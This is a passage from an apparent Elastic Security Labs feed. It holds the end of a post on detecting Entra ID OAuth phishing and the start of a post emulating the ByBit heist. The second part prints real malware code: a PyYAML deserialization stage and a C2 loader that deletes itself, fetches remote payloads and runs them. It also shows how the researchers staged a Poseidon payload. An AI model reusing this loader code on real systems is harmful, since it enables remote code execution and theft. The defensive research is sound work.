[ EVAL session_id + is_browser ]
        |
        |  ← Extracts session ID and flags browser-based activity
        ↓
[ STATS BY 30-minute window, user, session_id ]
        |
        |  ← Groups logins within same session and time window,
        |     then aggregates:
        |       - user/session/token identifiers
        |       - distinct IPs and geo info
        |       - user agent, browser presence
        |       - app/resource/client info
        ↓
[ WHERE ip_count ≥ 2 AND session_id_count == 1 ]
        |
        |  ← Identifies reuse of a single session ID
        |     across ≥ 2 different IP addresses
        ↓
[ AND has_browser ≥ 1 AND auth_count ≥ 2 ]
        |
        |  ← Requires at least one browser-based request
        |     and at least two total sign-in events
        ↓
[ Output = Suspicious OAuth Flow with Auth Broker for DRS ]

</code></pre>
<h3>Signal 2 - Suspicious ADRS Token Request by Microsoft Auth Broker</h3>
<p>Identifies Microsoft Entra ID sign-in events where a user principal authenticates using a refresh token issued to the Microsoft Authentication Broker (MAB) client, targeting the Device Registration Service (DRS) with the <em>adrs_access</em> OAuth scope. This pattern may indicate token-based access to DRS following an initial authorization code phishing or device registration flow.</p>
<pre><code>event.dataset: &quot;azure.signinlogs&quot; and azure.signinlogs.properties.app_id : &quot;29d9ed98-a469-4536-ade2-f981bc1d605e&quot; and azure.signinlogs.properties.resource_id : &quot;01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9&quot; and azure.signinlogs.properties.authentication_processing_details.`Oauth Scope Info`: *adrs_access* and azure.signinlogs.properties.incoming_token_type: &quot;refreshToken&quot; and azure.signinlogs.properties.user_type: &quot;Member&quot;
</code></pre>
<h3>Signal 3 - Unusual Device Registration in Entra ID</h3>
<p>Detects a sequence of Entra ID audit log events indicating potential malicious device registration activity using a refresh token, commonly seen after OAuth phishing. This pattern mimics the behavior of tools like ROADtx, where a newly registered Windows device (with a hardcoded OS version 10.0.19041.928) is added by the Device Registration Service, followed by user and owner assignments. All events must share the same correlation ID and occur within a one-minute window, strongly suggesting automation or script-driven registration rather than legitimate user behavior.</p>
<pre><code>sequence by azure.correlation_id with maxspan=1m
[any where event.dataset == &quot;azure.auditlogs&quot; and azure.auditlogs.identity == &quot;Device Registration Service&quot; and azure.auditlogs.operation_name == &quot;Add device&quot; and azure.auditlogs.properties.additional_details.value like &quot;Microsoft.OData.Client/*&quot; and (
  azure.auditlogs.properties.target_resources.`0`.modified_properties.`1`.display_name == &quot;CloudAccountEnabled&quot; and 
azure.auditlogs.properties.target_resources.`0`.modified_properties.`1`.new_value: &quot;[true]&quot;) and azure.auditlogs.properties.target_resources.`0`.modified_properties.`3`.new_value like &quot;*10.0.19041.928*&quot;]
[any where event.dataset == &quot;azure.auditlogs&quot; and azure.auditlogs.operation_name == &quot;Add registered users to device&quot; and azure.auditlogs.properties.target_resources.`0`.modified_properties.`2`.new_value like &quot;*urn:ms-drs:enterpriseregistration.windows.net*&quot;]
[any where event.dataset == &quot;azure.auditlogs&quot; and azure.auditlogs.operation_name == &quot;Add registered owner to device&quot;]
</code></pre>
<h3>Signal 3 - Entra ID RT to PRT Transition from Same User and Device</h3>
<p>This detection identifies when a Microsoft Entra ID user first authenticates using a refresh token issued to the Microsoft Authentication Broker (MAB), followed shortly by the use of a Primary Refresh Token (PRT) from the same device. This sequence is rare in normal user behavior and may indicate an adversary has successfully registered a device and escalated to persistent access using tools like ROADtx. By filtering out activity tied to the Device Registration Service (DRS) in the second step, the rule focuses on post-registration usage of the PRT to access other Microsoft 365 services.</p>
<p>This behavior strongly suggests token-based compromise and long-term session emulation, particularly when device trust is established silently. Catching this transition from refresh token to PRT is critical for surfacing high-fidelity signals of OAuth phishing and post-compromise persistence.</p>
<pre><code>sequence by azure.signinlogs.properties.user_id, azure.signinlogs.properties.device_detail.device_id with maxspan=1d
  [authentication where 
    event.dataset == &quot;azure.signinlogs&quot; and
    azure.signinlogs.category == &quot;NonInteractiveUserSignInLogs&quot; and
    azure.signinlogs.properties.app_id == &quot;29d9ed98-a469-4536-ade2-f981bc1d605e&quot; and
    azure.signinlogs.properties.incoming_token_type == &quot;refreshToken&quot; and
    azure.signinlogs.properties.device_detail.trust_type == &quot;Azure AD joined&quot; and
    azure.signinlogs.properties.device_detail.device_id != null and
    azure.signinlogs.properties.token_protection_status_details.sign_in_session_status == &quot;unbound&quot; and
    azure.signinlogs.properties.user_type == &quot;Member&quot; and
    azure.signinlogs.result_signature == &quot;SUCCESS&quot;
  ]
  [authentication where 
    event.dataset == &quot;azure.signinlogs&quot; and
    azure.signinlogs.properties.incoming_token_type == &quot;primaryRefreshToken&quot; and
    azure.signinlogs.properties.resource_display_name != &quot;Device Registration Service&quot; and
    azure.signinlogs.result_signature == &quot;SUCCESS&quot;
  ]
</code></pre>
<h3>Signal 4 - Unusual PRT Usage and Registered Device for User Principal</h3>
<p>This detection surfaces when a Microsoft Entra ID user registers a new device not previously seen within the last 7 days – behavior often associated with OAuth phishing campaigns that chain into ROADtx-based device registration. In these attacks, adversaries trick users into authorizing access for the Microsoft Authentication Broker (MAB) targeting the DRS, obtain a RT, and then use ROADtx to silently register a fake Windows device and mint a PRT. This rule alerts when a user principal authenticates from a newly observed device ID, particularly if the session is unbound, which is characteristic of token replay or device spoofing. Because PRTs require a registered and trusted device, this signal plays a critical role in identifying when an adversary has crossed from basic token abuse into persistent, stealthy access aligned with long-term compromise.</p>
<pre><code>event.dataset: &quot;azure.signinlogs&quot; and
    event.category: &quot;authentication&quot; and
    azure.signinlogs.properties.user_type: &quot;Member&quot; and
    azure.signinlogs.properties.token_protection_status_details.sign_in_session_status: &quot;unbound&quot; and
    not azure.signinlogs.properties.device_detail.device_id: &quot;&quot; and
    azure.signinlogs.properties.user_principal_name: *
</code></pre>
<p><a href="https://www.elastic.co/es/docs/solutions/security/detect-and-alert/about-detection-rules">New Terms</a> Values:</p>
<ul>
<li>azure.signinlogs.properties.user_principal_name</li>
<li>azure.signinlogs.properties.device_detail.device_id</li>
</ul>
<p>This emulation helped us validate the full attacker workflow – from phishing for consent to establishing device trust and minting a PRT for long-term persistence. By chaining OAuth abuse with device registration, adversaries can satisfy CAPs, impersonate compliant endpoints and move laterally through cloud environments – often without triggering traditional security controls.</p>
<p>These nuances matter. When viewed in isolation, individual events like token issuance or device registration may appear benign. But when correlated across sign-in logs, audit data and token metadata, they expose a distinct trail of identity compromise.</p>
<h1>Key Telemetry Details for Detection and Abuse</h1>
<p>Throughout our emulation and detection efforts, specific telemetry artifacts consistently proved essential for separating benign OAuth activity from malicious abuse. Understanding how these fields appear in Microsoft Entra ID logs – and how attackers manipulate them – is critical for effective hunting and detection engineering. From client IDs and grant types to device compliance, token types and conditional access outcomes, these signals tell the story of identity-based attacks. Below we have curated a list of those most important and how they can enable us.</p>
<p><strong>Client Application IDs (client_id)</strong>: Identify the application initiating the OAuth request. First-party clients (e.g. VSCode, Auth Broker) can be abused to blend in. Third-party clients may be malicious or unreviewed - often representing consent grant attacks. Mainly used to identify risky or unexpected app usage.</p>
<p><strong>Target Resource (resource_id / resource_display_name)</strong>: Defines which MSFT service is being accessed (e.g. MSFT Graph or Teams). High value targets include – Graph API, SharePoint, Outlook, Teams and Directory Services. Resource targeting is often scoped by attacker objectives.</p>
<p><strong>Principal type (user_type)</strong>: Indicates if the sign-in was by a member (user) or service principal. Phishing campaigns almost always target member accounts. This enables easy filtering in detection logic but helps pair unusual first-party client requests on-behalf-of user principals.</p>
<p><strong>OAuth Grant Type (authentication_processing_details)</strong>: Key to understanding how the token was obtained – authorization codes, refresh tokens, device codes, client credentials, etc. Whereas refresh tokens and device code reuse are high-fidelity signals of post-compromise.</p>
<p><strong>Geolocation</strong>: Enables us to identify atypical sign-ins (e.g. rare country seen) or impossible travel (same user from distant locations in a short time). Combined with session ID and correlation IDs, these can reveal token hijacking, post identity compromise or lateral movement.</p>
<p><strong>Device Metadata (device_detail, trust_type, compliance_state)</strong>: Includes Device IDs, operating system, trust types, compliance, managed-state and more. Device registration and PRT issuance are tied to this metadata. Often a goal for adversaries to satisfy CAP and gain trusted access that is persistent.</p>
<p><strong>Authentication Protocols and Types (authentication_protocol / incoming_token_type)</strong>: Reveals whether the session was OAuth-based or if MFA was used. Token sources incoming are those used for this request that provide authN or authZ. Useful for detecting token reuse, non-interactive sign-ins.</p>
<p><strong>Authentication Material and Session Context</strong>: Tokens used can be inferred via incoming token type, token protection status and the session ID. Session reuse, long session duration or multiple IPs tied to a single session often indicate abuse.</p>
<p><strong>Conditional Access Policy Status</strong>: Evaluated during token issuance – however it heavily influences whether access was granted. This helps identify CAP evasion, unexpected policy outcomes or can factor into risk.</p>
<p><strong>Scopes and Consent Behavior</strong>: Requested scopes appear in the SCP or OAuth parameters captured in sign-in logs. Indicators of abuse include <em>offline_access</em>, <em>.default</em>, or broad scopes like <em>Mail.ReadWrite</em>. Consent telemetry can help pivot or correlate if the user approved a suspicious application.</p>
<h1>Conclusion</h1>
<p>Microsoft Entra ID’s OAuth implementation presents a double-edged sword: it enables powerful, seamless authentication experiences – but also exposes new opportunities for adversaries to exploit trust, session persistence and device registration attack paths.</p>
<p>By replicating the OAuth phishing techniques observed by Volexity, our team was able to validate how attackers abuse legitimate Microsoft applications, token flows, and open-source tools to gain stealthy access to sensitive data. We extended this work through hands-on emulation, diving deep into the mechanics of OAuth phishing and workflows, security token metadata and acquisition, helping surface behavioral indicators that defenders can detect.</p>
<p>Our findings reinforce a key point: OAuth abuse doesn’t rely on malware or code execution. It weaponizes identity, consent, and token reuse – making traditional security controls a challenge – and why log-based detection, correlation and behavioral analysis are so critical.</p>
<p>We hope the emulation artifacts, detection rules, and lessons shared here help defenders across the community better understand – and detect/hunt – this evolving class of cloud-based identity threats.</p>
<p>If you're using Elastic, we’ve open-sourced all the detection rules discussed in this blog to get you started. And if you're hunting in another SIEM, we encourage you to adapt the logic and adjust to your environment accordingly.</p>
<p>Identity is the new perimeter – and it’s time we treated it that way. Stay safe and happy hunting!</p>
<h1>Detection Rules</h1>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/d41a83059c78129b4e1337dca10b190b862ca0d2/rules/integrations/azure/initial_access_entra_graph_single_session_from_multiple_addresses.toml">Microsoft Entra ID Session Reuse with Suspicious Graph Access</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/azure/initial_access_entra_oauth_phishing_via_vscode_client.toml">Microsoft Entra ID OAuth Phishing via Visual Studio Code Client</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/3625b1b392e03aa7693a5b8251e7a5d3cfa53cce/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml">Suspicious Microsoft OAuth Flow via Auth Broker to DRS</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/6b6407df88319f466c6cc56147210635bba5eb01/rules/integrations/azure/persistence_entra_id_suspicious_adrs_token_request.toml">Suspicious ADRS Token Request by Microsoft Auth Broker</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/43b0f0ada7e290bbbc0d4b1d53ed158e7bfbe75c/rules/integrations/azure/persistence_entra_id_suspicious_cloud_device_registration.toml">Unusual Device Registration in Entra ID</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/a18c76fe84eedc00efd9a712e74a0877b1061550/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml">Entra ID RT to PRT Transition from Same User and Device</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml">Unusual Registered Device for User Principal</a></li>
</ul>
<h1>References:</h1>
<ul>
<li><a href="https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/">https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/</a></li>
<li><a href="https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/">https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/</a></li>
<li><a href="https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30">https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30</a></li>
<li><a href="https://learn.microsoft.com/en-us/entra/identity/devices/concept-primary-refresh-token">https://learn.microsoft.com/en-us/entra/identity/devices/concept-primary-refresh-token</a></li>
<li><a href="https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens">https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens</a></li>
<li><a href="https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-auth-code-flow">https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-auth-code-flow</a></li>
<li><a href="https://learn.microsoft.com/en-us/entra/identity-platform/scopes-oidc#the-default-scope">https://learn.microsoft.com/en-us/entra/identity-platform/scopes-oidc#the-default-scope</a></li>
</ul>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/entra-id-oauth-phishing-detection/Security Labs Images 22.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Bit ByBit - emulation of the DPRK's largest cryptocurrency heist]]></title>
            <link>https://www.elastic.co/es/security-labs/bit-bybit</link>
            <guid>bit-bybit</guid>
            <pubDate>Tue, 06 May 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[A high-fidelity emulation of the DPRK's largest cryptocurrency heist via a compromised macOS developer and AWS pivots.]]></description>
            <content:encoded><![CDATA[<h2>Key takeaways</h2>
<p>Key takeaways from this research:</p>
<ul>
<li>PyYAML was deserialization as initial access vector</li>
<li>The attack leveraged session token abuse and AWS lateral movement</li>
<li>Static site supply chain tampering</li>
<li>Docker-based stealth on macOS</li>
<li>End-to-end detection correlation with Elastic</li>
</ul>
<h2>Introduction</h2>
<p>On February 21, 2025, the crypto world was shaken when approximately 400,000 ETH vanished from ByBit —one of the industry’s largest cryptocurrency exchanges. Behind this incredible theft is believed to be North Korea’s elite cyber-offensive unit, referred to as <a href="https://www.ic3.gov/PSA/2025/PSA250226">TraderTraitor</a>. Exploiting a trusted vendor relationship with Safe{Wallet}, a multisig (multi-signature) wallet platform, TraderTraitor transformed a routine transaction into a billion-dollar heist. Supply chain targeting has become a hallmark of the DPRK’s cyber strategy, underpinning the regime’s theft of more than <a href="https://www.chainalysis.com/blog/crypto-hacking-stolen-funds-2025/">$6 billion</a> in cryptocurrency since 2017. In this article we’ll dissect this attack, carefully emulate its tactics within a controlled environment, and provide practical lessons to reinforce cybersecurity defenses using Elastic’s product and features.</p>
<p>Our emulation of this threat is based on research released by <a href="https://www.sygnia.co/blog/sygnia-investigation-bybit-hack/">Sygnia</a>, <a href="https://x.com/safe/status/1897663514975649938">Mandiant/SAFE</a>, <a href="https://slowmist.medium.com/cryptocurrency-apt-intelligence-unveiling-lazarus-groups-intrusion-techniques-a1a6efda7d34">SlowMist</a>, and <a href="https://unit42.paloaltonetworks.com/slow-pisces-new-custom-malware/">Unit42</a>.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image12.png" alt="" /></p>
<h2>Chronology of events</h2>
<p>If you're here for the technical emulation details, feel free to skip ahead. But for context— and to clarify what was officially reported— we've compiled a high-level timeline of events to ground our assumptions based on the research referenced above.</p>
<p><strong>February 2, 2025</strong> – Infrastructure Setup</p>
<p>The attacker registers the domain getstockprice[.]com via Namecheap. This infrastructure is later used as the C2 endpoint in the initial access payload.</p>
<p><strong>February 4, 2025</strong> – Initial Compromise</p>
<p>Developer1’s macOS workstation is compromised after executing a malicious Python application. This application contained Docker-related logic and referenced the attacker’s domain. The file path (<code>~/Downloads/</code>) and malware behavior suggest social engineering (likely via Telegram or Discord, consistent with past <a href="https://www.elastic.co/es/security-labs/elastic-catches-dprk-passing-out-kandykorn">REF7001</a> and UNC4899 tradecraft).</p>
<p><strong>February 5, 2025</strong> – AWS Intrusion Begins</p>
<p>Attacker successfully accesses Safe{Wallet}’s AWS environment using Developer1’s active AWS session tokens.Attacker attempts (unsuccessfully) to register their own virtual MFA device to Developer1’s IAM user, indicating a persistence attempt.</p>
<p><strong>February 5–17</strong>: Reconnaissance activity begins within the AWS environment. During this time, attacker actions likely included the enumeration of IAM roles, S3 buckets, and other cloud assets.</p>
<p><strong>February 17, 2025</strong> – AWS Command and Control Activity</p>
<p>Confirmed C2 traffic observed in AWS. This marks the shift from passive reconnaissance to active staging of the attack.</p>
<p><strong>February 19, 2025</strong> – Web Application Tampering</p>
<p>A snapshot of app.safe.global (Safe{Wallet}’s statically hosted Next.js web app) captured by the Wayback Machine shows the presence of malicious JavaScript. The payload was crafted to detect a Bybit multisig transaction and modify it on-the-fly, redirecting funds to the attacker’s wallet.</p>
<p><strong>February 21, 2025</strong> – Execution and Cleanup</p>
<p>The exploit transaction is executed against Bybit via the compromised Safe{Wallet} frontend.</p>
<p>A new Wayback Machine snapshot confirms the JavaScript payload has been removed—indicating the attacker manually scrubbed it post-execution.</p>
<p>The Bybit heist transaction is finalized. Approximately 400,000 ETH is stolen. Subsequent analysis by Sygnia and others confirms that Bybit infrastructure was not directly compromised—Safe{Wallet} was the sole point of failure.</p>
<h2>Assumptions for emulation</h2>
<ul>
<li>Initial Social Engineering Vector:
Social engineering was employed to compromise Developer1, resulting in the execution of a malicious Python script. The exact details of the social engineering tactic (such as specific messaging, impersonation techniques, or the communication platform used) remain unknown.</li>
<li>Loader and Second-Stage Payload:
The malicious Python script executed a second-stage loader. It is currently unclear whether this loader and subsequent payloads match those detailed in Unit42's reporting, despite alignment in the initial access Python application's characteristics.</li>
<li>Safe Application Structure and Workflow:
The compromised application (<code>app.global.safe</code>) appears to be a Next.js application hosted statically in AWS S3. However, specific details such as its exact routes, components, development processes, version control methods, and production deployment workflow are unknown.</li>
<li>JavaScript Payload Deployment:
While attackers injected malicious JavaScript into the Safe{Wallet} application, it is unclear whether this involved rebuilding and redeploying the entire application or merely overwriting/modifying a specific JavaScript file.</li>
<li>AWS IAM and Identity Management Details:
Details regarding Developer1’s IAM permissions, roles, and policy configurations within AWS are unknown. Additionally, whether Safe{Wallet} used AWS IAM Identity Center or alternative identity management solutions remains unclear.</li>
<li>AWS Session Token Retrieval and Usage:
While reports confirm the attackers used temporary AWS session tokens, details about how Developer1 originally retrieved these tokens (such as through AWS SSO, <code>GetSessionToken</code>, or specific MFA configurations) and how they were subsequently stored or utilized (e.g., environment variables, AWS config files, custom scripts) are unknown.</li>
<li>AWS Enumeration and Exploitation Techniques:
The exact tools, enumeration methodologies, AWS API calls, and specific actions carried out by attackers within the AWS environment between February 5 and February 17, 2025, remain undisclosed.</li>
<li>AWS Persistence Mechanisms:
Although there is an indication of potential persistence within AWS infrastructure (e.g., via EC2 instance compromise), explicit details including tools, tactics, or persistence methods are not provided.</li>
</ul>
<h2>Overview of the attack</h2>
<p>Targeting companies within the crypto ecosystem is a common occurrence. DPRK continually targets these companies due to the relative anonymity and decentralized nature of cryptocurrency, enabling the regime to evade global financial sanctions. North Korea's offensive cyber groups excel at identifying and exploiting vulnerabilities, resulting in billions of dollars in losses.</p>
<p>This intrusion began with the <a href="https://x.com/safe/status/1897663514975649938?s=09">targeted compromise</a> of a developer's MacOS workstation at Safe{Wallet}, ByBit’s trusted multi-signature wallet provider. Initial access involved social engineering, likely approaching the developer via platforms like LinkedIn, Telegram, or Discord, based on previous campaigns, and convincing them to download an archive file containing a crypto-themed Python application—an initial access procedure favored by DPRK. This Python application also included a Dockerized version of the application that could be run inside a privileged container. Unknown to the developer, this seemingly benign application enabled DPRK operators to exploit a remote code execution (RCE) <a href="https://www.cvedetails.com/cve/CVE-2017-18342/">vulnerability</a> in the PyYAML library, providing code execution capabilities and subsequently control over the host system.</p>
<p>After gaining initial access to the developer's machine, attackers deployed <a href="https://github.com/its-a-feature/Mythic">MythicC2</a>'s <a href="https://github.com/MythicAgents/poseidon">Poseidon agent</a>, a robust Golang-based payload offering advanced stealth and extensive post-exploitation capabilities for macOS environments. The attackers then may have conducted reconnaissance, discovering the developer's access to Safe{Wallet}’s AWS environment and the usage of temporary AWS user session tokens secured via multi-factor authentication (MFA). Armed with the developer's AWS access key ID, secret key, and temporary session token, the threat actors then authenticated into Safe{Wallet}’s AWS environment within approximately 24 hours, capitalizing on the 12-hour validity of the session tokens.</p>
<p>Attempting to ensure persistent access to the AWS environment, the attackers tried to register their own MFA device. However, AWS temporary session tokens do not permit IAM API calls without <a href="https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html#:~:text=You%20cannot%20call%20any%20IAM,in%20the%20IAM%20User%20Guide">MFA authentication context</a>, causing this attempt to fail. Following this minor setback, the threat actor enumerated the AWS environment, eventually discovering an S3 bucket hosting Safe{Wallet}'s static Next.js user interface.</p>
<p>The attackers could then have downloaded this Next.js application’s bundled code, spending nearly two weeks analyzing its functionality before injecting malicious JavaScript into the primary JS file and overwriting the legitimate version hosted in the S3 bucket. The malicious JavaScript code was activated exclusively on transactions initiated from Bybit’s cold wallet address and an attacker-controlled address. By inserting hardcoded parameters, the script circumvented transaction validation checks and digital signature verifications, effectively deceiving ByBit wallet approvers who implicitly trusted the Safe{Wallet} interface.</p>
<p>Shortly thereafter, the DPRK initiated a fraudulent transaction, triggering the malicious script to alter transaction details. This manipulation, likely, contributed to misleading the wallet signers into approving the illicit transfer, thereby granting DPRK operatives control of approximately 400,000 ETH. These stolen funds were then laundered into attacker-controlled wallets.</p>
<p>We chose to end our research and behavior emulation at the compromise of the Next.js application. Thus, we do not dive into the blockchain technologies, such as ETH smart contracts, contract addresses, and sweep ETH calls discussed in several other research publications.</p>
<h2>Emulating the attack</h2>
<p>To truly understand this breach we decided to emulate the entire attack chain in a controlled lab environment. As security researchers at Elastic, we wanted to walk in the footsteps of the attacker to understand how this operation unfolded at each stage: from code execution to AWS session hijacking and browser-based transaction manipulation.</p>
<p>This hands-on emulation served a dual purpose. First, it allowed us to analyze the attack at a granular, technical level to uncover practical detection and prevention opportunities. Second, it gave us the chance to test Elastic’s capabilities end-to-end—to see whether our platform could not only detect each phase of the attack, but also correlate them into a cohesive narrative that defenders could act on.</p>
<h3>MacOS endpoint compromise</h3>
<p>Thanks to <a href="https://unit42.paloaltonetworks.com/">Unit42</a>’s detailed write-up—and more critically, uploading recovered samples to VirusTotal—we were able to emulate the attack end-to-end using the actual payloads observed in the wild. This included:</p>
<ul>
<li>PyYAML deserialization payload</li>
<li>Python loader script</li>
<li>Python stealer script</li>
</ul>
<h4>Malicious Python Application</h4>
<p>The initial access Python application we used in our emulation aligns with samples highlighted and shared by <a href="https://www.slowmist.com/">SlowMist</a> and corroborated by Mandiant's <a href="https://x.com/safe/status/1897663514975649938">incident response findings</a> from the SAFE developer compromise. This application also matched the directory structure of the application shown by Unit42 in their write-up. Attackers forked a legitimate stock-trading Python project from GitHub and backdoored it within a Python script named <code>data_fetcher.py</code>.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image13.png" alt="Python Application Directory Structure" /></p>
<p>The application leverages <a href="https://streamlit.io/">Streamlit</a> to execute <code>app.py</code>, which imports the script <code>data_fetcher.py</code>.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image5.png" alt="Python Application README.txt usage" /></p>
<p>The <code>data_fetcher.py</code> script includes malicious functionality designed to reach out to an attacker-controlled domain.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image8.png" alt="data_fetcher.py class with yaml.load functionality" /></p>
<p>The script, by default, fetches valid stock market-related data. However, based on specific conditions, the attacker-controlled server can return a malicious YAML payload instead. When evaluated using PyYAML’s unsafe loader (<code>yaml.load()</code>), this payload allows for arbitrary Python object deserialization, resulting in RCE.</p>
<h4>PyYAML Deserialization Payload</h4>
<p>(VT Hash: <code>47e997b85ed3f51d2b1d37a6a61ae72185d9ceaf519e2fdb53bf7e761b7bc08f</code>)</p>
<p>We recreated this malicious setup by hosting the YAML deserialization payload on a Python+Flask web application, using PythonAnywhere to mimic attacker infrastructure. We updated the malicious URL in the <code>data_fetcher.py</code> script to point to our PythonAnywhere-hosted YAML payload.</p>
<p>When PyYAML loads and executes the malicious YAML payload, it performs the following actions:</p>
<p>First, it creates a directory named <code>Public</code> in the victim’s home directory.</p>
<pre><code class="language-py">directory = os.path.expanduser(&quot;~&quot;)
directory = os.path.join(directory, &quot;Public&quot;)

if not os.path.exists(directory):
    os.makedirs(directory)
</code></pre>
<p>Next, it decodes and writes a base64-encoded Python loader script into a new file named <code>__init__.py</code> within the <code>Public</code> directory.</p>
<pre><code class="language-py">filePath = os.path.join(directory, &quot;__init__.py&quot;)

with open(filePath, &quot;wb&quot;) as f:
    f.write(base64.b64decode(b&quot;BASE64_ENCODED_LOADER_SCRIPT&quot;))
</code></pre>
<p>Finally, it executes the newly created <code>__init__.py</code> script silently in the background, initiating the second stage of the attack.</p>
<pre><code class="language-py">subprocess.Popen([sys.executable, filePath], start_new_session=True, stdout=DEVNULL, stderr=DEVNULL)
</code></pre>
<h4>Python Loader Script</h4>
<p>(VT Hash: <code>937c533bddb8bbcd908b62f2bf48e5bc11160505df20fea91d9600d999eafa79</code>)</p>
<p>To avoid leaving forensic evidence, the loader first deletes its file (<code>__init__.py</code>) after execution, leaving it running in memory only.</p>
<pre><code class="language-py">directory = os.path.join(home_directory, &quot;Public&quot;)

    if not os.path.exists(directory):
        os.makedirs(directory)

    try:
        body_path = os.path.join(directory, &quot;__init__.py&quot;)
        os.remove(body_path)
</code></pre>
<p>This loader’s primary goal is to establish continuous communication with the Command-and-Control (C2) server. It gathers basic system information—like OS type, architecture, and system version—and sends these details to the C2 via an HTTP POST request to the hardcoded /club/fb/status URL endpoint.</p>
<pre><code class="language-py">params = {
        &quot;system&quot;: platform.system(),
        &quot;machine&quot;: platform.machine(),
        &quot;version&quot;: platform.version()
    }
    while True:
        try:
            response = requests.post(url, verify=False, data = params, timeout=180)
</code></pre>
<p>Based on the server’s response (ret value), the loader decides its next steps.</p>
<h5>ret == 0:</h5>
<p>The script sleeps for 20 seconds and continues polling.</p>
<pre><code class="language-py">if res['ret'] == 0:
    time.sleep(20)
    continue
</code></pre>
<h5>ret == 1:</h5>
<p>The server response includes a payload in Base64. The script decodes this payload, and writes it to a file—named <code>init.dll</code> if on Windows or <code>init</code> otherwise—and then dynamically loads the library using <code>ctypes.cdll.LoadLibrary</code>, which causes the payload to run as a native binary.</p>
<pre><code class="language-py">elif res['ret'] == 1:
    if platform.system() == &quot;Windows&quot;:
        body_path = os.path.join(directory, &quot;init.dll&quot;)
    else:
        body_path = os.path.join(directory, &quot;init&quot;)
        with open(body_path, &quot;wb&quot;) as f:
            binData = base64.b64decode(res[&quot;content&quot;])
            f.write(binData)
            os.environ[&quot;X_DATABASE_NAME&quot;] = &quot;&quot;
            ctypes.cdll.LoadLibrary(body_path)
</code></pre>
<h5>ret == 2:</h5>
<p>The script decodes the Base64 content into Python source code and then executes it using Python’s <code>exec()</code> function. This allows for running arbitrary Python code.</p>
<pre><code class="language-py">elif res['ret'] == 2:
    srcData = base64.b64decode(res[&quot;content&quot;])
    exec(srcData)
</code></pre>
<h5>ret == 3:</h5>
<p>The script decodes a binary payload (<code>dockerd</code>) and a binary configuration file (<code>docker-init</code>) into two separate files, sets their permissions to be executable, and then attempts to run them as a new process, supplying the config file as an argument to the binary payload. After execution of the binary payload, it deletes its executable file, leaving the config file on disk for reference.</p>
<pre><code class="language-py">elif res['ret'] == 3:
    path1 = os.path.join(directory, &quot;dockerd&quot;)
    with open(path1, &quot;wb&quot;) as f:
        binData = base64.b64decode(res[&quot;content&quot;])
        f.write(binData)

    path2 = os.path.join(directory, &quot;docker-init&quot;)
    with open(path2, &quot;wb&quot;) as f:
        binData = base64.b64decode(res[&quot;param&quot;])
        f.write(binData)

    os.chmod(path1, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR |
                    stat.S_IRGRP | stat.S_IXGRP |
                    stat.S_IROTH | stat.S_IXOTH)

    os.chmod(path2, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR |
                    stat.S_IRGRP | stat.S_IXGRP |
                    stat.S_IROTH | stat.S_IXOTH)

    try:
        process = subprocess.Popen([path1, path2], start_new_session=True)
        process.communicate()
        return_code = process.returncode
        requests.post(SERVER_URL + '/club/fb/result', verify=False, data={&quot;result&quot;: str(return_code)})
    except:
        pass

    os.remove(path1)
</code></pre>
<h5>ret == 9:</h5>
<p>The script breaks out of its polling loop, terminating further actions.</p>
<pre><code class="language-py">elif res['ret'] == 9:
    break
</code></pre>
<p>After processing any command, the script continues to poll for further instructions from the C2 server.</p>
<h4>Python Loader Emulation</h4>
<p>Our goal was to test each of the command options within the loader to better understand what was happening, collect relevant telemetry data, and analyze it for the purpose of building robust detections for both our endpoint and the SIEM.</p>
<p><strong>Ret == 1: Write Library to Disk, Load and Delete Dylib</strong></p>
<p>The payload we used for this option was a <a href="https://github.com/MythicAgents/poseidon">Poseidon</a> payload compiled as a shared library (<code>.dylib</code>).</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image9.png" alt="Mythic C2 Payload Builder" /></p>
<p>We then base64-encoded the binary and were able to hardcode the path to that base64-encoded payload in our C2 server to be served when testing this specific loader command.</p>
<pre><code class="language-shell">base64 poseidon.dylib &gt; poseidon.b64
</code></pre>
<pre><code class="language-py">BINARY_PAYLOAD_B64 = &quot;BASE64_ENCODED_DYLIB_PAYLOAD&quot;  # For ret==1
STEALER_PAYLOAD_B64 = &quot;BASE64_ENCODED_STEALER_SCRIPT&quot; # For ret==2
MULTI_STAGE_PAYLOAD_B64 = &quot;BASE64_ENCODED_MULTISTAGE_PAYLOAD&quot; # For ret==3
# For testing we simulate a command to send.
